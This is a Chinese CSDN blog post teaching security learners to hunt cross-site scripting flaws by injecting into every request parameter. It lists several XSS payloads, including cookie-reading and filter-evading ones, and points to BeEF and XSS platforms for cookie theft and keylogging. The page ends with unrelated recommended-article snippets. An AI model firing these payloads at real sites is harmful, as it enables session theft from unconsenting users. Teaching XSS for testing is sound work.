说好的见框就插呢?

最新推荐文章于 2024-06-21 19:10:13 发布
最新推荐文章于 2024-06-21 19:10:13 发布
阅读量88 收藏
点赞数
文章标签: 渗透测试 黑盒测试 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/131769093
版权

说好的见框就插呢?

背景

每一个学安全的,都听说过一句话,挖XSS就是见框就插,不得不说这个方法很有用,但是经常遇到插不进去的情况。今天浅聊一下XSS漏洞
在这里插入图片描述

一句话讲原理

XSS原理和注入很像,核心也是用户输入的数据被当作代码执行了,一个是插入了数据库语句,一个是插入了JS语句

速挖XSS

(1)基础方法:

见框就插的原理是因为,http传参通常是通过这种方法传参的,本质是通过参数去传入xss语句,所以我们抓包对所有有参数的地方进行xss语句拼接会发现更多以前没发现的点

在这里插入图片描述
可以一个个插入恶意语句试试

(2)个人常用语句

每一个都很好用!

\u201c\u003e\u003cimg src=1 onerror=alert(document.cookie)\u003e
<img src=1 onerror=alert(document.cookie)>
%22onclick=prompt+1
1;{onerror=alert}throw 1337
"><img src=1 onerror = top['ale'+'rt'](1)>

(3)利用工具

分享个人经常使用的利用工具,可以屏幕截图,键盘记录,偷取cookie等操作

kali自带的beefxss工具很好用!
在这里插入图片描述
在这里插入图片描述

xss平台也很不错!
在这里插入图片描述

猫鼠信安
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Markdown中如何入视频 > iframe?
北岛向南的小站 - CSDN
01-12 1万+
关于Markdown中如何入视频这一问题   网上众说纷纭,一直也没找到一个确切的答案,想来也是,这些东西毕竟还不算成熟、各种以前提供过的方法现在来讲,可能在更新或是关闭大潮中又没了   而且,Markdown 这种结构,在不同的博客等可支持平台上,似乎某些细微之处或是一些特有规定也是不尽相同的。  话不多说,下面直接给出几个展示效果!   效果一
html入页码,Word添加页码后,每一页的页码都一样怎么办?
weixin_34321609的博客
07-02 2733
回答:Word文档中入页码的问题一、页码从第二页开始1、选择“入-页码”,打开“页码”对话。2、取消“首页显示页码”复选中的对钩,然后单击“格式”按钮,打开“页码格式”对话。3、“起始页码”后的中键入数字“0” 。4、按“确定”退出。二、页码从任意页开始1、将光标定位于需要开始编页码的页首位置。2、选择“入-分隔符”,打开“分隔符”对话,在“分隔符类型”下单击选中“下一页”单选钮。...
ChatGPT 编写模式:如何高效地将思维架赋予 AI ?
Phodal's zenthink
02-22 1万+
如何理解 Prompt ?Prompt Enginneeringprompt 通常指的是一个输入的文本段落或短语,作为生成模型输出的起点或引导。prompt 可以是一个问题、一段文字描述、一段对话或任何形式的文本输入,模型会基于 prompt 所提供的上下文和语义信息,生成相应的输出文本。举个例子,对于一个语言模型,prompt 可以是 "The cat sat on the",模型可以通过对接下...
如何写好一篇技术型文档?
博客园地址
01-26 1万+
如何写好一篇技术型文档 周智 2022/1/20 参加工作时间久一点的工程师应该有这样一个体会:自己平时代码写得再多再好,可一旦要用文档去描述或者表达某一个事情或者问题时,都感觉非常困难,无从下手,不知道自己该写什么不该写什么;或者费了九牛二虎之力写出来的东西没法满足要求,需要再三去修改调整。这其中的主要原因我归纳有两点: 1.思维方式固化。大部分人平时代码写得太多,文字类型的表述又写得太少。而代码和文字明显是两种不同的思维方式,在代码里陷得太深,不容易跳出来; 2.本身文字表达能力有限。这个跟写代
Python Web架哪家强? Django vs Flask深度对比
大江狗
09-02 2万+
对一个刚入门Web开发的新手而言,世界上最悲催的事莫过于花大力气学了一门语言或架却发现它已经要过气了。如果你刚刚开始使用Python进行Web开发,你一定想知道应该学习...
程序员如何写好技术文档?建议收藏
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
03-24 4648
????????关注后回复“进群”,拉你进程序员交流群????????作者:周智来源:www.cnblogs.com/xiaozhi_5638/p/15847859.html参加工作时间久一点的工程师应该有这样一个体会:自己平时代码写得再多再好,可一旦要用文档去描述或者表达某一个事情或者问题时,都感觉非常困难,无从下手,不知道自己该写什么不该写什么;或者费了九牛二虎之力写出来的东西没法满足要...
android 优秀架整理
热门推荐
黄孝果的博客
01-11 4万+
程序员界有个神奇的网站,那就是github,这个网站集合了一大批优秀的开源架,极大地节省了开发者开发的时间,在这里我进行了一下整理,这样可以使我们在使用到时快速的查找到,希望对大家有所帮助! 1. Retrofit   一句话介绍:Retrofit是一款类型安全的网络架,基于HTTP协议,服务于Android和java语言 上榜理由:Retrofit以21.8k的stars量雄踞gith
贵的键盘就一定好吗?程序员该怎样选择一款适合自己的键盘呢,来这里参考下吧
努力前行,总会成为自己心中的那道光
11-16 4万+
作为一个程序员,每天跟我们打交道最多的应该就是我们的电脑了。 而说起电脑自然就得来提一提 键盘⌨️ 和 鼠标🖱️ 啦! 键盘 是最常用也是最主要的输入设备,通过键盘可以将英文字母、汉字、数字、标点符号等输入到计算机中,从而向计算机发出命令、输入数据等。 下面本篇文章就来介绍一下关于 键盘的一些常规踩坑点,让我们可以选择一款适合自己键盘吧! 顺便来简单给大家推荐一款我觉得很好用的键盘:keychron K4
java导出特殊字符_java poi架导出excel如何入特殊字符(复选勾选)
weixin_35048266的博客
02-27 2100
java poi架导出excel如何入特殊字符(复选勾选)java poi架导出excel如何入特殊字符(复选勾选)java poi架导出excel如何入特殊字符(复选勾选)google了好久java导出excel如何导出复选勾选状态,没有找到可行的结果,实际操作了一下,要不就是导不出,要不就是导出之后不正确。先看看要导出的excel格式吧就是一个单元格中包含了中文和方的符号...
如何快速向数据库1000万数据?4种方法对比,它简单却速度最快
勇往直前的专栏
03-21 1万+
前言 一直有一种说法:批量入大量数据到MySQL数据库,不要使用Mybatis、Hibernate之类的ORM架,原因一般都是说性能不好,至于为什么不好好像没几个人能讲清楚的。 批量入大量数据最优的方式是什么?网上也是众说纷纭。不如自己动手测试一下吧! 场景介绍 前几天公司项目进行压力测试,测试某个功能在大数据量(千万级)的情况下是否能够正常运行,可是项目还没有正式上线运营,数据库里...
笔记本不能上网怎么办?.docx
09-27
如果是这样的话,你好网线一般就能解决了! 6.重新设置拔号 如果网线没有接错,但还是不能拔号成功的话,那就来重新设置拔号吧。 操作:先点击向导,下一步,选择 PPPOE 方式,输入用户名密码(别写错哦,注意...
bee:Bee是一个AI,简单高效的ORM
05-12
好的功能:人工智能,省时/有品味,简单,自动( AiTeaSoft风格) 蜜蜂: 或者: 要求 jdk1.7 + 功能特点: 支持多种数据库(MySQL,MariaDB,Oracle,H2,SQLite,PostgreSQL,SQL Server等)并易于扩展。性能...
honey:Bee是一个AI,简单高效的ORM架。 蜂蜜是蜜蜂的执行
04-13
好的功能:人工智能,省时/有品味,简单,自动( AiTeaSoft风格) 蜜蜂: 或者: 要求 jdk1.7 + 功能特点: 支持多种数据库(MySQL,MariaDB,Oracle,H2,SQLite,PostgreSQL等)并且易于扩展。 V1.0 单一...
AHibernate1.1
11-19
更多使用示例博客: http://blog.csdn.net/lk_blog 早期版本AHibernate1.0下载地址:http://download.csdn.net/detail/lk_blog/4222048 本版主要修改的内容: 1.修改bug,实体类的属性定义为int时自动生成Id正常,定义...
nilify_blanks:提供了一个架,用于在您宁愿使用DB NULL而不是简单地使用空字符串的情况下将传入的空白值保存为nil在数据库中的情况
05-07
如果您仍然想使这些列无效,则可以使用`only:`(下文)明确提及它们。 仅属性响应为空白? 值为true的将转换为nil。 因此,例如,这不适用于值为0的整数字段。 用法最好通过示例显示:要求 从v1.4.0开始,此gem...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8295
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CAC 2.0融合智谱AI大模型,邮件安全新升级
最新发布
CACTER_S的博客
06-21 208
CAC2.0反钓鱼防盗号已成功引入清华智谱ChatGLM大语言模型!
【启明智显产品分享】Model3工业级HMI芯片详解系列专题(三):安全、稳定、高防护
ami82的博客
06-20 505
Model3芯片具备高达8KV的ESD HBM防护,在恶劣的工业环境中能够抵抗各种电磁干扰,提升系统可靠性;Model3芯片支持高精度电子脉宽调制(EPWM)控制,能够满足复杂电机控制和精细过程控制的需要,在控制应用中更加精准;Model3芯片内置4线电阻触摸屏驱动,为用户提供便捷的交互途径,降低了外围BOM成本。
c++中串口的安全封装使用
jjjxxxhhh123的博客
06-21 113
对于内置类型,如果不显式初始化,它们的值是未定义的,可能包含任何内容。在你的代码中,buffer是一个字符数组,不需要显式初始化,因为你马上就会用::read函数把数据填充进去。字符串构造:如果::read返回负值,那么std::string(buffer, bytes_read)中的bytes_read将是负值,这会导致未定义行为。你需要确保bytes_read是非负的。在上述代码中,我添加了对read函数返回值的检查,以确保没有发生错误。如果::read返回负值,我们将抛出一个异常,以指示读取失败。
上面所说的搜索在哪里?
07-17
抱歉,可能我前面的回答有些误导。浏览器开发者工具中没有特定的搜索来搜索HTML属性。...如果你仍然无法找到搜索或进行搜索,请告诉我你使用的是哪个浏览器和开发者工具版本,我将尽力提供更具体的指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值